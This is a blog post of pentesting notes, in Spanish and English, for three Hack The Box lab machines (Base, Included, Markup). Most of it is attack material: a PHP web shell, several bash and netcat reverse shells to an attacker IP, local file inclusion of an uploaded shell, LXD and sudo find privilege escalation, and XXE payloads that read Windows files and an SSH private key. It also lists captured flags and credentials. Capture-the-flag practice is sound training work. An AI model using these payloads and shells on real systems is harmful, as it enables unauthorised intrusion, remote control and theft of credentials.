HTB - Base / Included / Markup

HTB - Base

Esto no es un WriteUp. Este post solo contiene notas de utilidad, datos exfiltrados y enlaces de investigaci贸n para el pentesting de una m谩quina de pruebas.
This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.

10.129.95.184

<?php echo system($_REQUEST['cmd']);?>

/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.216/4499 0>&1'

cmd=/bin/bash+-c+'bash+-i+>%26+/dev/tcp/10.10.15.216/443+0>%261'

$username = "admin";
$password = "thisisagoodpassword";www-data@base:/$

f54846c258f3b4612f78a819573d158e

sudo find . -exec /bin/sh \; -quit

51709519ea18ab37dd6fc58096bea949

Logro: Link



HTB -Included

Esto no es un WriteUp. Este post solo contiene notas de utilidad, datos exfiltrados y enlaces de investigaci贸n para el pentesting de una m谩quina de pruebas.
This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.

10.129.95.185

https://es.wikipedia.org/wiki/TFTP

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

curl 'http://10.129.95.185/?file=/var/lib/tftpboot/shell.php'

python3 -c 'import pty;pty.spawn("/bin/bash")

a56ef91d70cfbf2cdb8f454c006935a1

https://linuxcontainers.org/lxd/introduction/

https://book.hack tricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

python3 -m http.server 8000

wget http://10.10.15.216:8000/lxd.tar.xz

wget http://10.10.15.216:8000/rootfs.squashfs

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

c693d9c7499d9f572ee375d4c14c7bcf

Logro: Link



HTB - Markup



Esto no es un WriteUp. Este post solo contiene notas de utilidad, datos exfiltrados y enlaces de investigaci贸n para el pentesting de una m谩quina de pruebas.

This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.

10.129.95.192

nmap -sCV -A -n -Pn -p- -v --min-rate 5000 -oG allPorts 10.129.95.192

Portswigger xxe xml entities

OWASP XML External Entity (XXE) Processing

w3.org REC xml
External Entities

https://book.hack tricks.xyz/pentesting-web/xxe-xee-xml-external-entity

owasp.org/www-community/attacks/csrf

032d2fc8952a8c24e39c8f0ee9918ef7

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>
3
</quantity>
<item>
&test;
</item>
<address>
17th Estate, CA
</address>
</order>

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>

chmod 400 id_rsa

032d2fc8952a8c24e39c8f0ee9918ef7

microsoft.com windows commands wevtutil

icacls job.bat

echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.33 1234 > C:\Log-Management\job.bat

Logro: Link

Comments

Post a Comment

Popular Posts